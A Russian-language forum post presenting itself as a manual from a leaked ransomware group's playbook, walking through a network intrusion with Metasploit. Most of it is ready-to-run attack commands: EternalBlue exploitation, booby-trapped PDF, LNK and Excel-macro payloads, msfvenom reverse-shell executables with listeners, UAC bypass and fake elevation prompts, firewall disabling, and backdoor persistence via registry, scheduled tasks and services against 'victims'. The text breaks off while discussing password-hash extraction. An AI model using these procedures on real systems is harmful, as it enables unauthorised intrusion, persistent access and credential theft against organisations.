Мануал/Книга Как пентестят сетки

[BuyKall]

Данный материал был взят из утечки, которую устроил недовольный работник.
Конечно же я всё это усвоил, у вот получился у меня вот такой мануальчик.
Тема ранса вроде спадает, и мною было решено выложить данный мануал(надеюсь он уже ни кому не навредит).
Если бы выложил его раньше, то возможно что "молодые" ребята начали пользоваться им.
Что принесло бы не мало бед компаниям и конечно же самим ребятам.
Пользуйтесь с осторожностью, я же надесь что это не нанесёт вреда ни кому!!!

Самому мне было интересно, что же эта за тема такая, и что они делают.
Сам я конечно же не занимался этим, и от моих эксперементов и любопытства страдали только виртуальные машины.

ДАННЫЙ ВИД ПЕНТЕСТА ДЕЛИТЬСЯ НА ТАКИЕ ВОТ ЭТАПЫ:

- Сбор информации об атакуемом объекте(Reconnaissance):
- IP-адреса/доменные имена
- Whois/DNS записи
- Email/Телефоны

- Сканирование(Scanning/Enumeration):
- Определение операционной системы
- Сканирование портов
- Сканирование на уязвимость
- Определение пользователей и разделяемых ресурсов

- Получение доступа/Эксплуатация(Gaining access/Exploitation)

- Пост-эксплуатация(Post-exploitation):
- Сбор информации(файлы, пароли и т.д.)
- Закрепление доступа(backdoor, Trojan, rootkit)
- Атака на другие машины
- Сокрытие следов взлома

ОСНОВНЫЕ ТЕРМИНЫ:

- Уязвимость(vulnerability)
Ошибки в поведении программы или операционной системы, вызванные несовершенным програмированием и проектированием. Используя уязвимость можно получить контроль над программой или всей системой.

- Эксплуатация уязвимости(vulnerability exploitation)
Использование слабости программы для получения контроля над системой.

- Эксплоит(exploit)
Программа, которая эксплуатирует уязвимость.

- Полезная нагрузка(payload)
Программа, которая выполняет определённое действие(удалённый доступ, похищение паролей и др.), если эксплуатация окажется успешной.

ТЕПЕРЬ ПОГОВОРИМ ПРО METASPLOIT:

- Многофункциональная платформа
- Эксплуатация уязвимости
- Сканирование портов
- Сканирование на уязвимость
- Создание backdoor
- Обход антивирусов и систем обнаружения вторжений(IDS/IPS)

Позже когда я продолжал знакомиться с этой программой, меня бударажило от того какой софт создали эти парни...
Похожие чувства я испытывал лишь когда изучал sqlmap....

ТИПЫ ЭКСПЛУАТАЦИИ:

- Удалённая(server-side) - характерна для серверных приложений(WEB, SSH, FTP, NetBIOS и так далее) имеющие открытый порт и ожидающие подключения со стороны клиентов. Не требует взаимодействия пользователя.

- Локальная(client-side) - характерная для любых несерверных приложений(интернет браузеры, медиа плееры, программы просмотра и редактирования документов различного формата и так далее). Необходимо взаимодействие пользователя.

- Повышение привелегий(privilege escalation) - используется для повышения прав пользователя(administrator, root, SYSTEM) в системе. Реализуется в процессе локальной/серверной эксплуатации либо уже после эксплуатации. Иногда требуется взаимодействие пользователя.

СТУРКТУРА МОДУЛЕЙ:

Я взял скриншоты из видео, а потом приложил скриншоты с актуальной версии kali linux(metasploit легко устанавливается из официального репозитория git'ом в любою линукс систему и не только), чтобы вы могли посмореть сами на них....их колчество впечатляет.

А вот и скрины с кали

БАЗОВЫЕ КОМАНДЫ:
Это самая важная команда, которая есть в этом софте
help

Посмотреть справку по определённой команде:
help set

Есть команды, которые имеют большой функционал и справка у неё будет громадная.
help creds

With no sub-command, list credentials. If an address range is
given, show only credentials with logins on hosts within that
range.

Usage - Listing credentials:
  creds [filter options] [address range]

Usage - Adding credentials:
  creds add uses the following named parameters.
    user      :  Public, usually a username
    password  :  Private, private_type Password.
    ntlm      :  Private, private_type NTLM Hash.
    postgres  :  Private, private_type postgres MD5
    ssh-key   :  Private, private_type SSH key, must be a file path.
    hash      :  Private, private_type Nonreplayable hash
    jtr       :  Private, private_type John the Ripper hash type.
    realm     :  Realm,
    realm-type:  Realm, realm_type (domain db2db sid pgdb rsync wildcard), defaults to domain.

Examples: Adding
   # Add a user, password and realm
   creds add user:admin password:notpassword realm:workgroup
   # Add a user and password
   creds add user:guest password:'guest password'
   # Add a password
   creds add password:'password without username'
   # Add a user with an NTLMHash
   creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
   # Add a NTLMHash
   creds add ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
   # Add a Postgres MD5
   creds add user:postgres postgres:md5be86a79bf2043622d58d5453c47d4860
   # Add a user with an SSH key
   creds add user:sshadmin ssh-key:/path/to/id_rsa
   # Add a user and a NonReplayableHash
   creds add user:other hash:d19c32489b870735b5f587d76b934283 jtr:md5
   # Add a NonReplayableHash
   creds add hash:d19c32489b870735b5f587d76b934283

General options
  -h,--help             Show this help information
  -o <file>             Send output to a file in csv/jtr (john the ripper) format.
                        If file name ends in '.jtr', that format will be used.
                        If file name ends in '.hcat', the hashcat format will be used.
                        csv by default.
  -d,--delete           Delete one or more credentials

Filter options for listing
  -P,--password <text>  List passwords that match this text
  -p,--port <portspec>  List creds with logins on services matching this port spec
  -s <svc names>        List creds matching comma-separated service names
  -u,--user <text>      List users that match this text
  -t,--type <type>      List creds of the specified type: password, ntlm, hash or any valid JtR format
  -O,--origins <IP>     List creds that match these origins
  -r,--realm <realm>    List creds that match this realm
  -R,--rhosts           Set RHOSTS from the results of the search
  -v,--verbose          Don't truncate long password hashes

Examples, John the Ripper hash types:
  Operating Systems (starts with)
    Blowfish ($2a$)   : bf
    BSDi     (_)      : bsdi
    DES               : des,crypt
    MD5      ($1$)    : md5
    SHA256   ($5$)    : sha256,crypt
    SHA512   ($6$)    : sha512,crypt
  Databases
    MSSQL             : mssql
    MSSQL 2005        : mssql05
    MSSQL 2012/2014   : mssql12
    MySQL < 4.1       : mysql
    MySQL >= 4.1      : mysql-sha1
    Oracle            : des,oracle
    Oracle 11         : raw-sha1,oracle11
    Oracle 11 (H type): dynamic_1506
    Oracle 12c        : oracle12c
    Postgres          : postgres,raw-md5

Examples, listing:
  creds               # Default, returns all credentials
  creds 1.2.3.4/24    # Return credentials with logins in this range
  creds -O 1.2.3.4/24 # Return credentials with origins in this range
  creds -p 22-25,445  # nmap port specification
  creds -s ssh,smb    # All creds associated with a login on SSH or SMB services
  creds -t ntlm       # All NTLM creds

Example, deleting:
  # Delete all SMB credentials
  creds -d -s smb

Отобразит доступные модули и скрипты, которые есть в данной системе.
help show

Посмотреть все эксплоиты, которые есть в арсенале
show exploit

Найдёт все модули для определённого модуля, в данном случае telnet
search telnet

Найдёт только експлоиты для telnet
search type:exploit telnet

Найдёт експлоиты для Windows под telnet
search type:exploit platform:windows telnet

Запросить справку по конкретному эсплоиту
info exploit/windows/telnet/goodtech_telnet

Рекомендую так же читать инфу по ссылкам, которые попадаются в документакции....

Выбрать эксплоит, который будет использован
use /exploit/windows/telnet/goodtech_telnet

Когда строка поменяет вид, это будет нам говорить что мы перешли к настройке эксплоита.
Поэтому если сейчас ввести команду help, отобразятся дополнительные команды.

Когда был выбран Exploit, нужно выбрать Payload

Если ввести команду show payloads когда активен, экспоит, то он покажет конкретные payload для этого эксплоита.

info windows/messagebox
Если после прочтения информации о нагрузке, хочется её использовать
set payload windows/messagebox

Для того, чтобы посмотреть опции которые доступны:
show options

Опции будут показаны как для екплоита так и для нагрузки.

После того как будут внесены какие-то параметры, можно посмотреть общую картину.
Ну а теперь нужно запустить всё это дело:
exploit

Этой информации достаточно, чтобы научиться пользоваться Metasploit....
Теперь перейдём к более насущным темам...

ПРЕДВАРИТЕЛЬНЫЙ СБОР ИНФОРМАЦИИ:

Есть хорошая книга по данной тематике, ссылку на скачку выкладывать не буду, но книгу можно найти вот так: google hacking for penetration testers

Ну и довольно банальные линки:

OffSec’s Exploit Database Archive

The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers.

www.exploit-db.com

Explore

Search Engine for the Internet of Things

www.shodan.io

- Для чего нам нужны емайлы ?
Ну конечно же для атаки через социальную инженерию:
- Phishing - отправка электронных писем с инфицированными файлами или ссылками на заражённые сайты
- Spamming - массовая реклама
- Fraud - электронные письма с подменными адресами отправителей, чтобы убедить получателя выполнить определённое действия
- Цели
- Инфицировать компьютер
- Сбор определённой информации
- Заставить и убедить получателя выполнить определённые действия

- Где и как найти email объекта ?
- Поисковые системы(google, shodan)
- Социальные сети(LinkedIn, Facebook)

Программы для посика электронных адресов:
- Theharvester(в коробке kali)
- Metasploit(auxiliary/gather/search_email_collector)
- Google hacking
- Maltego

Лично я попробовал модуль от metasploit(см выше), а так же Theharvester

Как говориться, Google - найдётся всё....
Нас больше всего интересуют документы, сетевые устройства, имена пользователей и их пароли, уязвимости в сервиса,
версии программного обеспечения и любая конфиденциальная информация....

Поисковые операторы, которые нам в этом помогут
- inurl - поиск URL
- intext - поиск текста на веб странице
- filetype - поиск определённого файла
- cache - поиск кэшированных страниц
- site - поиск определённых веб сайтов
- intitle - поиск заголовков веб страниц
- | - логическое "ИЛИ"(OR). Используется для объединения нескольких операторов
- - - исключает поисковой элемент

Пример:
site:best_of_the_best_company.com filetype:pdf
Найдёт все открытые pdf фалы которые есть на данном сайте

Осталось поиграться, и да! в интернете есть множество пособий, на том же habr, как пользоваться google-dorks....рекомендую!
Так же хорошо искать по кешированным страницам сайта, это даст вам немного анонимности и
конечно же даст вам доступ к данным, которые уже могли быть удалены с сайта...пригодится.

Что такое Shodan?
Думаю тут каждый знаком с этим фруктом, но всё же - это поисковой сервис утсройст, подключённых к интернету.
Он читает баннер устройства и извлекает из него информацию.

Что мы можем найти:
- Уязвимости
- Маршрутизаторы/Домашние модемы
- Онлайн службы
- Устаревшие операционные системы и серверы без обновлений
- Веб камеры/Потоковое видео
- Эксплоиты
- Промышленные Системы Управления(SCADA)

Опции:
фильтр / описание / пример
os / тип операционной системы / os:"Linux"
net / диапазоны IP/CIDR адресов / net:"200.1.1.1/24"
hostname / имя устройства / hostname:"router.arpa.net"
product / название программы / product:"Apache"
version / версия программы / version:"2.3"
country / код страны / country:"RU"
port / номер порта от сетевой службы / port:"23"
category / доступная категория / category:"malware"

Пример: os:"Windows XP" port:"80" country:"DE"

Для правильного движения нейронов вашей голове, это действительно достаточно.

СКАНИРОВАНИЕ ПОРТОВ ИНТЕГРИРОВАННЫМ NMAP:

Сканирование nmap'ом из metasploit
Для начала нужно посмотреть
help db_nmap

Создать пространство
workspace -a Project_111

И теперь запустить сканирование
db_nmap -A 192.168.044

Проверить бд можно так:
hosts - посмотреть всю информацию о хосте
services - посмотреть порты запущенные на хосте
vulns - посмотреть уязвимости доступные для этого хоста
notes - посмотреть заметки

ВЗЛОМ СИСТЕМЫ ЧЕРЕЗ УЯЗВИМОСТЬ В SMB MS17-010:

Так как мы уже научились искать и смотреть справку, выполним такую команду
search type:exploit ms17-010

Теперь его нужно выбрать
use exploit/windows/smb/ms17_010_eternalblue

Если хочется посмотреть информацию об этом эксплоите, тогда нужно ввести команду
info

Теперь нужно посмотреть какие пайлоады доступны к этому експлоиту
show payloads

После того как нагрузка выбрана, нужно указать что мы хотим её использовать
set payloads windows/x64/shell/bind_tcp

Теперь нужно установить парамерт RHOST
set rhost 192.168.0.51

Нужно посмотреть параметры которые необходимы для нашей нагрузки
show options

Тут можно посмотреть параметры, обязательные для експлоита

А тут можно посмотреть параметры нагрузки

После того, как всё проверено, можно запустить експлоит
exploit

После того как получен доступ к cmd можно посмотреть что за система попалась
sysinfo

Был получен доступ к shell, сейчас попробуем получить доступ к meterpreter.

В чём отличие? Meterpreter круче, так как может показать намного больше информации о системе, а так же позволяет исползовать скрипты.
set payload windows/x64/meterpreter/bind_tcp

Прорим есть ли необходимость установить дополнительные параметры
show options
, а потом запускаем експлоит
exploit

sysinfo

ПОЛУЧЕНИЕ УДАЛЁННОГО ДОСТУПА ЧЕРЕЗ ГРАФИЧЕСКИЙ ИНТЕРФЕЙС:

show payloads

В MetaSploit есть несколько модулей, которые поддерживают VNC
Для примера выберем это:
set payload windows/x64/vncinject/bind_tcp

Можно посмотреть параметры, которые можно поменять
show options

Стоит обратить внимание на необязательный параметр ViewOnly, он позволяет использоавть VNC в режиме наблюдателя.
Т.е. можно будет только смотреть, но не управлять системой. Если планируется использовать атакуемую систему, то стоит дать опции ViewOnly опцию false
set viewonly false
Теперь можно перейти к запуску эксплоита
exploit

BIND VS REVERSE:

В качестве примера, возьмётся нагрузка generic/shell_bind_tcp
set payload generic/shell_bind_tcp
и посмотрим его опции
show options

Теперь посмотрим его же вариант только в reverse
set payload generic/shell_reverse_tcp
и заглянем в опции
show options

Стоит обратить внимание на LHOST который является обязательным.
Т.е. нужно утсановить свой IP адрес, для того чтобы атакуемый хост соединился с ним.

ВЗЛОМ WEB СЛУЖБЫ В ПРОГРАММЕ ICECAST:

MetaSploit умеет проводить атаку "Переполнение буфера"
search type:exploit icecast

use exploit/windows/http/icecast_header
Теперь попробуем подобрать нужную нагрузку
show payloads

например вот этот
set payload windows/meterpreter/bind_tcp
и посмотрим его опции
show options

Для примера:
setg rhost 192.168.0.128
exploit
sysinfo

DOS АТАКА НА УДАЛЁННУЮ СИСТЕМУ:

search type:auxiliary ms15-034
так же есть второй скрипт который способен длать нужное
search type:auxiliary ms12-020

Провери параметры модуля, можно заметить что у него всего два параметра
Порт оствим таким же, а IP поменяем
set rhost 192.168.0.51
exploit

ВНЕДРЕНИЕ ИСПОЛНЯЕМОГО КОДА В PDF ДОКУМЕНТ:

search type:exploit embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set payload windwows/meterpreter/reverce_tcp
show options

FILENAME - выходной файл
INFILENAME - иходный файл из которого будет делать pdf
LAUNCH_MESSAGE - сообщение об ощибке при открытии файла

set filename forensecs.pdf
set infilename /root/Downloads/network_forensics.pdf
set lhost 192.168.0.16
exploit

Метасплоит сгенерирует файл, скопируем его в папку веб-сервера
cp /root/.msf4/local/forensics.pdf /var/www/htlm/

Так как эксплоит генерирует только файл, нужно создать слушителя
use exploit/multi/handler
set payload windows/meterpreter/reverce_tcp
set lhost 192.168.0.16
exploit

Когда пользователь откроет PDF файл, прилетит сессия meterpreter
Когда пользователь закроет PDF файл, сессия останется открытой, так как она привяжется к другому процессу.

ВЗЛОМ КОМПЬЮТЕРА ЧЕРЕЗ USB НОСИТЕЛИ И ОБЩИЕ СЕТЕВЫЕ ПАПКИ:

Рассмиотрим узявимость, которая используется при помощи USB-флешки или общей сетевой папки на сервере.
Для этого достаточно расположить два файла: .lnk(в простонродье - ярлык) и файл динамической подключаемой библиотеки .dll(.cpl).
Когда пользователь открывает папку, которая хранит данные файлы - система начинает обрабатывать ярлык,
в результате данной обработки вызывается библиотечный файл, который находится в этой же папке(он содержит вредоносный код PAYLOAD).

use explot/windwos/fileformat/cve_2017_8464_lnk_rce
set payload windows/x64/meterpreter/reverce_tcp

Посмотрим какие параметры необходимо установить
show options

Что касается експлоита, то там все параметры не обязательные, а вот у нагрузки есть обязательный параметр LHOST
После того как параметр будет установлен, для примера
set lhost 192.168.0.16

Будет сгенерировано множество ярлыков и один dll файл

Почему создаётся множество файлов ? дело в том что нужно указать конкретную букву диска к которому подключится флеш накопитель.
От этого метасплоит создаёт ярлык для каждой буквы, которой может стать флешка. Так как не можем изначально знать это.

После того, как файлы будут лежать где нужно → нужно создать слушателя
use exploit/multi/handler
set payload_windows/x64/meterpreter/reverce_tcp

После того, как флешка будет открыта, прилетит сесия
Возникает вопрос, если мы не открывали файл, то куда инжектируется метерпретер ?

В системах Windows есть специальная служба для запуска библиотечных файлов, назвается RunDLL32.exe
Именно в него и инжектируется PAYLOAD

Если процесс завершить, то закроется и сама сессия.

ВНЕДРЕНИЕ МАКРОСА В ДОКУМЕНТ MS OFFICE:

С помощью MetaSploit мы создадим код на языке VisualBasic, этот код мы вставим в документ EXELE.
Затем его можно отправить пользователю и ждать пока, тот его откроет.

use windows/meterpreter/reverce_tcp

Проверим параметры
show options

В нашем случае достаточно установить параметры для LHOST
set lhost 192.168.0.16
generate -t vba

-t выводит код в текстовом виде
vba показывает программе, что код нужно генерировать именно на языке VisualBasic

В результате будет сгенерирован код, который нужно скопировать и вставить в документ

Тут нужно ввести имя макроса

В открывшемся окне, удалим генерированный код

И вставим свой код

Сохраняем наш документ с поддержкой макросов(Книга Excel с поддержкой макросов *.xlsm)

Нужно не забыть запустить слушатель, перед тем как подсунуть файл
Когда на атакуемой машине будет открыт файл → прилетит сессия

Сессия привязывается к документу, если его закрыть то закроется и сессия.

Для того, чтобы остаться в системе можно использовать опции megrate для того чтобы инжектироваться в другой процесс.

ГЕНЕРИРОВАНИЕ САМОСТОЯТЕЛЬНОГО ФАЙЛА С MSFVENOM:

Суть заключается в том, что создаётся нагрузка в отдельный файл. Потом запускается слушатель, и как пользователь откроет файл - прилетит сесиися.
msfvenom -p windows/meterpreter/reverse_tcp lport=5000 lhost=192.168.0.12 -f exe -o /var/www/html/test.exe

-p отвечает за ПОЛЕЗНУЮ НАГРУЗКУ
lport порт на который будет отстукивать хост
lhost ip на который будет отстукивать
-f отвечает за формат в которой будет создана нагрузка
-o отвечает за место где нужно сохрнанить файл

Файл готов, теперь нужно включить слушатель
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 12.168.0.12
set lport 5000
run

Теперь остаётся отправить программу на ПК жертвы.
С кали легче всего скачать файл за счёт веб-сервера(service apache2 start)

Для того чтобы выбрать нагрузку, можно посмотреть какие нагрузки есть доступные
msfvenom —list payloads

Если хочется посмотреть нагрузку только для Windows
msfvenom --list payloads | grep windows

А если нужна нагрузка под виндоуз с meterpreter
msfvenom —list payloads | grep windows | grep meterpreter

Для того, чтобы посмотреть все доступные форматы выходных файлов
msfvenom —help-formats

СПИСОК КОМАНД ДЛЯ РАБОТЫ В METERPRETER:

help – помощь, вызов справки
getpid – отображение номера процесса, под которым работает Meterpreter
ps – список всех текущих процессов
migrate – мигрирование Meterpreter в другой процесс
sysinfo – отображение краткой информации об удаленной системе
getuid – отображение текущего пользователя, от имени которого работает Meterpreter
show_mount – список физических и логических дисков
ifconfig/ipconfig – отображает сетевые настройки
arp – отображает МАС и IP адреса локальных устройств, с которыми взаимодействовал хост
netstat – отображает текущие сетевые соединения
route – отображение таблицы маршрутизации
getproxy – получение информации о системном прокси-серевере
pwd – отображает текущую директорию/папку
cd – команда для перехода в другую директорию/папку
dir/ls – отображает список файлов и папок в указанной директории
search – поиск файлов
download – скачивает файлы с удаленной машины на локальную
dupload – загружает файлы с локальной машины на удаленную
idletime – отображает время неактивности пользователя на удаленном компьютере
webcam_snap – делает снимок со встроенной удаленной камеры
webcam_stream – получает видео поток со встроенной удаленной камеры
record_mic – запись звука на удаленной машине
webcam_chat – организация видеочата

СПИСОК ОСНОВНЫХ КОМАНД ДЛЯ РАБОТЫ В CMD:

netuser – локальные пользователи
whoami/all - сведения о текущем пользователе
driverquery – список установленных драйверов

ipconfig/all – сетевые настройки
ipconfig/diplaydns – кэшированные DNS записиa
arp–a - IP адреса, с которыми общался компьютер
netstat – установленные соединения
–a - список открытых портов
–ao - список открытых портов и номера процессов
-abo - список открытах портов, номеров процессов и их названия
–r - таблица маршрутизации

netshfirewallshowconfig - просмотр настроек фаервола
netshfirewall set opmode disable – отключение фаервола

tasklist – список текущих процессов
taskkill
/f
/pid «номер процесса» – отключение процесса
schtaksks – запланированные задачи
scquery - список всех служб
scquery «название службы» - проверка состояния службы
scstart/stop «название службы» - запуск/остановка службы
netstart – запущенные службы

cd – навигация по файловой системе
dir – просмотр файлов и папок в текущей папке
/ah - отображение скрытых файлов и папок
/ad – отображение папок
/b
/s «папка и искомое слово» - поиск файлов по ключевому слову
mkdir - создание папки

УПРАВЛЕНИЕ КОМПЬЮТЕРОМ ЖЕРТВЫ ЧЕРЕЗ КОМАНДНУЮ СТРОКУ CMD:

Не всегда будет доступен графический интерфей, поэтому нужно уметь делать всё через CMD.
Кроме того , при помощи команд можно выполнять действия намного быстрее.

После того, как мы полчили доступ к хосту, нужно собрать как можно больше информации о неё.

whoami /all
Group Name - имя пользователя и группы в которые он входит
Privilege Name - привелегии пользователя

Чтобы проверить какие локальные пользователи зарегистрированы в сети:
net user

Можно посмотреть заплатки которые установлены в системе:
systeminfo
Покажет как заплатки для ОС так и для ПО
Так же покажет информацию о системе

Чтобы узнать все установленные драйвера:
driverquery

Проверить сетевые настройки
ipconfig
ipconfig /displaydns

Команда arp -a выдаст кушированные ARP записи
Укажет IP и MAC адреса для вашей локальной сети

Посмотреть активные соединения
netstat
Посмотреть все активные порты
netstat -a

Открытые порты сообщают, что запущена служба или программа серверного типа, которая просто ждёт входящего подключения.
Чтобы узнать номер процесса и название программы, которая использует открытый порт
netstat -abo

Для отображения таблицы маршрутизации:
netstat -r

Для того, чтобы проверить настройки фаервола:
netsh firewall show config
Operational mode = Enable - фаервол включён
File location - место где находиться LogFile фаерволла.
Для того чтобы отключить фаерволл:
netsh firewall set opmode disable

Управление процессами и службами
tasklist
Чтобы завершить процесс, нужно ввести:
taskkill /f /pid 1816
/f - для принудительного завершения процесса

Для того чтобы посмотреть список запланироанных задач
schtasks
Чтобы увидеть запущенные службы
net start
Чтобы что-то остановить:
sc stop spooler
Чтобы проверить, отключилась ли служба:
sc qwery spooler

Найти на диске C файлы со словом Notepad в названии
dir /b /s c:\**notepad

ПОВЫШЕНИЕ ПРИВЕЛЕГИЙ ДОСТУПА:

Начиная от Windows Vista в Windows был установлен механизм контроля доступа пользователей UAC.

Все приложения, для работы которых требуется маркер доступа администратора, должны запрашивать подтверждение администратора.
Существует только одно исключение — это взаимосвязь между родительским и дочерним процессами.
Дочерние процессы наследуют маркер доступа пользователя от родительского процесса. При этом как родительский, так и дочерний процессы должны иметь один и тот же уровень целостности.

Например: Если мы запустили Exploer от администратора, и потом открываем им наш експлоит, то эксплоит будет запущен от имени администратора.
Так как его родитель Exploer запущен от имени администратора.

Способ 1
Если на хосте есть программы, которые испоьзуют права администратора. И они используют dll(которые как правило находятся в папке установленной программы.).
Если заменить легитимную dll на вредоносную dll, при запуске программы(она как всегда просит чтобы запустили её от имени администратора) она будет обращаться к своим dll и тогда наш експлоит будет выполнен.

Способ 2
Некоторые COM объекты в своей работе используют dll. При этом эти файлы могут находиться на любой папке компьютера. Пути к этим dll хранятся в реестре. И при зпуске программы,
она проверяет реестр и смотрит пути к этим библиотекам. Если изменить путь в реесте и указать путь к нашему коду, то системная программа обратиться к нашему коду.
При том, что изменить реестр достаточно прав обычного пользоавтеля.

"Повышение привелегий возможно только при определённых условиях"
Пользователь должен иметь обычный аккаунт и находиться в администраторской группе.

whoami /groups

Данная запись говорит, что пользователь находиться в администраторской группе.

А эта запись(а конкретнее слово - Medium) говорит что пользоавтель имеет обычный аккаунт

Если вместо этого было бы LOW - пользователь имеет учётную запись с ограниченными правами.

Для начала воспользуемся командой getuid для того, что бы посмотреть имя текущего пользователя.

getsystem служит для поднятия привелегий. После её выполнения, снова взглянем на имя своей учётной записи

Но команда getsystem срабатывает не всегда.

Поэтому можно использовать другие техники, основанные на уязвимости операционной системы.
background переключить метерпретер в фоновый режим.

Теперь введём следующую команду:
use exploit/windows/local/buypassuac_comhijack
Проверим доступные опции show options
Как видно, нужно установить лишь один параметр SESSION
так как у нас уже есть сессии в фоне, можно вернутся к одной из них
sessions ⇒ 2
Для данного експлоита устанавливать пайлоад не нужно, он будет вставлен автоматически. Но если всё таки сделать set payload....
можно указать какую-то другую полезную нагрузку.
И теперь повторно выполним команду getsystem
На этот раз она сработала.

Проверим пользователя getuid

Для сравнения введём whoami /groups

Как видно мы имеем System Mandatory Level

Т.е. повышенные привилегии. И стоит помнить что права SYSTEM стоят выше чем Administrator.

Если по каким-то причинам данный эксплоит не сработал, то можно использовать другой.
use exploit/windows/local/bypassuac
По привычке проверим опции, которые нам доступны show options(Такие трюки не проходят на тачках выше Windows 8 )

Но не стоит здаваться так как можно попробовать воспользоваться експлоитами exploit/windows/oracle
Но работают они так себе!

Но есть ещё один трюк, который может повысить привилегии в системе.
Трюк заключается в том, что мы попросим пользователя, чтобы тот дал согласие на повышение привилегий.
Для начала нужно ввести команду idletime
Она показывает активен ли пользователь в данный момент, или возможно он отошёл от ПК.
Если мы понимаем, что пользователь активен:
use exploit/windows/local/ask
Проверим параметры show options
Нас интересует параметр TECHNIQUE
Для запутывания антивирусов и самого пользователя, рекомендуется использовать параметр PowerShell
set technique PSH
Теперь запускаем експлоит
run

На атакуемой системе появляется такое окно, пользователь может подумать что какому то процессу нужны права администратора,
и так как он ни чего подозрительного не делал, он не может поверить в то что на другом проводе жду его уже я.

Если он нажмёт на YES → прилитит сессия с новыми правами.
Стоит обратить внимание на имя пограммы....И его автора.

Но есть одна проблема, у этого эксплоита есть ТАЙМАУТ , если пользователь будет долго решаться на какую кнопку нажать - слушатель закроется.
Когда закроется слушатель, даже если пользователь нажмёт YES сессия не прилетит, так как просто не куда. Этот способ иногда срабатывает и может быть полезен.

УСТАНОВКА БЕКДОРА:

Для установки бекдора нам необходимо повысить права.
getsystem
getuid

Для просмотра всех опций:
run persistence -h

выполним команду:
run persistence -X -i 5 -p 4444 -r 192.168.0.16
-X бекдор запуститься сразу же после системы
-i 5 с интервалом в 5 минут
-p 4444 на удалённый порт 4444
-r 192.168.0.16 с удалённым адресом 192.168.0.16

После выполнения мы будем видеть где установлен бекдор в системе
Так же снизу тут показан ключ реестра для автозагруки бекдора в системе

Для того, чтобы проверить реестр, действительно ли там выставлены правильные настройки:
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Теперь закроем сессию
quit
и откроем слушатель
use exploit/multi/handler
run
теперь если наш компьютер будет перезапущен. и мы заново откроем слушатель → сессия прилетит.

Этот способ так себе, и работает лишь левой ногой прокинутой за правым ухом.....лучше пресмотреться к другим модулям постэксплуатации:
search persistence

УСТАНОВКА БЕКДОРА ЧЕРЕЗ ПЛАНИРОВЩИК ЗАДАЧ:

Для начала нужно создать сам бекдор, после чего через meterpreter нужно загрузить бекдор на компьютер жертвы, желательно в системные папки.

upload /root/Desktop/backdoor.exe c:/users/ieuser

Так же можно повысить привелегии на хосте жертвы и это даст возможно переименовать бекдор как системный файл, чтобы снять с него подозрения.

Когда файл загружен, его нужно переодически запускать.
schtasks /CREATE /TN "backdoor" /ST 14:15 /SC DAILY /MO 1 /RI 2 /TR "c:/users/ieuser/backdoor.exe"
/CREATE - создать
/TN - название задачи
/ST 14:15 - запуститься в 14:15
/SC DAILY - будет запускаться каждый день
/RI - задача будет повторяться каждые две минуты
/TR "c:/users/ieuser/backdoor.exe" - запускать программу, которая расположена по адресу c:/users/ieuser/backdoor.exe

Задача создана успешно. Теперь выходим из этого режима и запускаем слушатель. Когда заданные параметры будут соблюдены, наш бекдор прокинет нам сессию на наш слушатель.

УСТАНОВКА БЕКДОРА ЧЕРЕЗ СЛУЖБЫ:

Ещё один способ для запуски бекдора, бекдор будет запускаться автоматически при старте системы.

Для начала нужно загрузить бекдор, например в системную папку:
upload /root/Desktop/backdoor.vbs c:/windows/system32

Теперь нужно перейти в режим shell
shell

Создать новую службу, которая будет запускать бекдор
sc create backdoor binpath= "cmd.exe /k c:\windows\sytem32\backdoor.vbs" start= auto

Если на удалённом хосте посмотреть Службы
Можно увидеть бекдор.
Пока перезагружем атакуемый хост, можно включить слушатель
resource /root/Desktop/Meta_scripts/listener.rc
После того как система стартует, она запускает службы, в том числе и наш бекдор.

ГДЕ ХРАНЯТСЯ ПАРОЛИ В WINDOWS:

Для авторизации пользователей, в системе используется специальный сервис проверки подленности локальной проверки безопасности( Local Security Authority LSA).

Есть ещё одна служба которая участвует в авторизации пользователей → Security Account Manager(SAM)

По сути данная система представляет из себя БД локальных пользователей, которая хранит логины и пароли(хешированные).

Как это происходит

Пользователь вводит пару login:pass → LSA генерирует хеш введённого пароля и обращается в SAM для того чтобы получить из БД SAM хеш этого логина → LSA сверяет хеш, который дал ему SAM.
Если хеши одинаковые → пользователь проходит авторизацию, в противном случае ему заново придётся платить пароль.

Каким образом система вычисляет хеш пароля
Существует два способа:

Lan Manager(LM) считается очень слабым и на его замену пришёл NT Lan Manager(NTLM). Темнеменне LM досих пор используется в различных системах, включая Windows 10. Это сделано для совместимости систем.

Как работает Lan Manager
Когда вводиться пароль, и если он короче 14 символов, вместо недостующих символов дописываются нули, после чего пароль переводиться в верхний регистр.

После чего последовательность делиться на две равние части, каждая часть шифруется по алгоритму DES. В качестве ключа используется: KSG!@#$%

 

[BuyKall]

После операции, две части соединяются что и является хеш-паролем, который сохраняется в локальной БД контроля доступа.

Процесс вычисления NT хеша
Тут всё намного проще, введённый пароль просто шифруется по алгоритму MD4 и на этом всё.

Где храниться хеш
Они храняться как на локальном компьютере, так и в Active Directory(если компьютер подключён к домену).

Как получить хеш-пароли

Нужно помнить, что данная операция доступна только правам SYSTEM

ГДЕ И КАК ХРАНЯТЬСЯ ПАРОЛИ В LINUX:

В целях безопасности, пароли тоже не храняться в открытом виде, вместо них храниться сам хеш.
Когда пользователь вводит пароль, к нему присоединяется специальная уникальная последовательность(СОЛЬ и она является уникальной на всех компьютерах).
Соль используется для противодействиям атакам на пароль, кроме того она гарантирует что хеш пароля ни когда не будет одинаковой на разных хостах, даже если сами пароли будут одинковыми.
Затем пароль обрабатывается хеш функцией и в результате мы имеем обычный хеш-пароль.

Где храниться
Логин пользователя
/etc/passwd - открыт для всех пользователей, но только root может изменять его

Хэш пароля
/etc/shadow - зыкрыт от всех пользователей, кроме пользователя root

ТЕОРИЯ ПРИНЦИПА ВЗЛОМА ПАРОЛЕЙ:

Хеш функция является односторонним процессом, и в обратном порядке с хеша не полчить пароль.

Суть заключается в том, что мы берём списко с паролями и получаем хеш каждого пароля,
после чего хеши сравниваются, совпадают → пароль найден.

ПОЛУЧЕНИЕ ХЕША ПАРОЛЕЙ:

В системах Windows есть специальные файл реестра Security Account Manager(т.е. диспетчер учётных записей).
